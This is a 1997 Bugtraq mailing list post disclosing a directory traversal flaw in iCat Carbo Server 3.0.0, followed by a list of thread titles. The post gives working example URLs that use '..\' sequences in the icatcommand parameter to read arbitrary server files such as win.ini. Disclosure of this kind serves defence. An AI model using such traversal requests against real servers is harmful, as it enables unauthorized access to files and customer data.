Bugtraq mailing list archives
Security bug in iCat Suite version 3.0
From: Mikael.Johansson () ABC SE (Mikael Johansson)
Date: Sat, 8 Nov 1997 11:11:12 +0100
iCat Carbo Server is a program used to create interactive shopping catalogs for the www. It was selected by PC Magazine's editors as the best Web storefront creation software. I've found a bug in the iCat Carbo Server Version 3.0.0. The bug let's everyone view any file at a system that is using Carbo (except for files with some special characters). See for yourselves... http request: http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog http answer: [iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244] Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm' To view their c:\winnt\win.ini: http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog As you can imagine this bug is rather dangerous. For example an evil hacker could steal creditcard information from users that have bought something at a site using Carbo Server 3.0.0. Mikael Johansson Mikael.Johansson () abc se
Current thread:
- Re: Intel Pentium Bug Daniele Orlandi (Nov 07)
- Re: Intel Pentium Bug Aleph One (Nov 07)
- Re: Intel Pentium Bug Ian McWilliam (Nov 08)
- <Possible follow-ups>
- Re: Intel Pentium Bug John Pettitt (Nov 07)
- Sidenote of Pentium Bugs Dave (Nov 07)
- Security bug in iCat Suite version 3.0 Mikael Johansson (Nov 08)
- Re: Intel Pentium Bug JoelKatz (Nov 07)
- Re: Intel Pentium Bug Joe Ilacqua (Nov 07)
- Re: Intel Pentium Bug Rubens Kuhl Jr. (Nov 07)
- Re: Intel Pentium Bug Ralf Baechle (Nov 10)
- Re: Intel Pentium Bug Barry Irwin (Nov 08)
- Re: Intel Pentium Bug Bjorn Wesen (Nov 08)
- Re: Intel Pentium Bug Peter Bierman (Nov 08)
- Re: Intel Pentium Bug Aleph One (Nov 08)
- Microsoft Office security bug Aleph One (Nov 07)
- Re: Microsoft Office security bug Inigo Gonzalez (Nov 11)
- Microsoft Office security bug Aleph One (Nov 07)
(Thread continues...)
- Re: Intel Pentium Bug Aleph One (Nov 07)